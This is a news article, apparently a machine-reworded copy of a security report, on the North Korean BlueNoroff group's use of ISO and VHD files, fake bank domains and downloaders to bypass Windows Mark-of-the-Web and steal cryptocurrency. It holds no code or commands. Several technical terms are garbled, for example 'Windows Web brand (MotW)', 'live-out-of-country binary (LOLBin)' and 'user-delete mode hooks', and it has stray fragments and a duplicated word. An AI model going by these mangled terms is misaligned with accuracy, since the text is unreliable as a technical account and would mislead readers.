BlueNoroff APT hackers use new ways to bypass Windows MotW protection

December 27, 2022Ravie LakshmananCyberattack / Windows Security

BlueNoroffa sub-cluster of the notorious Lazarus Group, has been observed adopting new techniques in its playbook that allow it to circumvent Windows Web brand (MotW).

This includes the use of optical disc (.ISO extension) and virtual hard disk (.VHD extension) image file formats as part of a new infection chain, Kaspersky revealed in a report published today. today.

“BlueNoroff created many fake domains posing as venture capitalists and banks,” security researcher Seongsu Park said, adding that the new attack procedure was reported in his telemetry in September 2022.

Some of the bogus domains were found to imitate ABF Capital, Angel Bridge, ANOBAKA, Bank of America and Mitsubishi UFJ Financial Group, most of which are located in Japan, signaling “strong interest” in the region.

Also referred to by the names APT38, Nickel Gladstone, and Stardust Chollima, BlueNoroff is part of the larger Lazarus threat group which also includes Andariel (aka Nickel Hyatt or Silent Chollima) and Labyrinth Chollima (aka Nickel Academy).

The threat actor’s financial motivations, as opposed to espionage, have made them an unusual nation-state actor in the threat landscape, allowing “wider geographic spread” and enabling them to infiltrate organizations across North and South America, Europe, Africa and Asia.

cyber security

He has since been linked to high-profile cyberattacks targeting the SWIFT banking network between 2015 and 2016, including the audacious Bangladesh Bank heist in February 2016 that led to the theft of $81 million.

Lazarus Group

Since at least 2018, BlueNoroff appears to have undergone a tactical shift, moving away from bank strikes to focusing solely on cryptocurrency entities to generate illicit revenue.

To that end, Kaspersky earlier this year leaked details of a campaign dubbed SnatchCrypto orchestrated by the adversarial collective to drain digital funds from victims’ cryptocurrency wallets.

Another key activity attributed to the group is AppleJeus, in which fake cryptocurrency companies are created to trick unwitting victims into installing benign-looking apps that end up receiving backdoor updates.

The latest activity identified by the Russian cybersecurity firm introduces slight modifications to convey its final payload, swapping Microsoft Word document attachments for ISO files in spear phishing emails to trigger the infection.

These optical image files, in turn, contain a Microsoft PowerPoint slideshow (.PPSX) and a Visual Basic script (VBScript) that is executed when the target clicks a link in the PowerPoint file.

In another method, a Windows batch file containing malware is launched by exploiting a live-out-of-country binary (LOLBin) to retrieve a second-stage downloader used to fetch and execute a payload remotely.

Lazarus Group

Kaspersky also discovered a sample .VHD bundled with a decoy job description PDF that is armed to spawn an intermediate downloader that masquerades as antivirus software to fetch the next stage payload, but not before disabling genuine EDR solutions by removing user-delete mode hooks.

Although the exact backdoor delivered is unclear, it is believed to be similar to a persistent backdoor used in SnatchCrypto attacks.

The use of Japanese filenames for one of the decoy documents along with the creation of fraudulent domains disguised as legitimate Japanese venture capital firms suggests that the island nation’s financial firms are likely targets of BlueNoroff.

Cyber ​​warfare has been a major focus of North Korea in response to economic sanctions imposed by a number of countries and the United Nations over concerns about its nuclear programs. It also became a major source of income for the cash-strapped country.

Indeed, according to South Korea’s National Intelligence Service (NIS), state-sponsored North Korean hackers are estimated to have stolen $1.2 billion worth of cryptocurrency and other digital assets from targets around the world. entire over the past five years.

“This group has a strong financial motivation and is actually successful in profiting from its cyberattacks,” Park said. “It also suggests that attacks by this group are unlikely to decrease in the near future.”

Did you find this article interesting ? follow us on Twitter and LinkedIn to read more exclusive content we publish.

Leave a Reply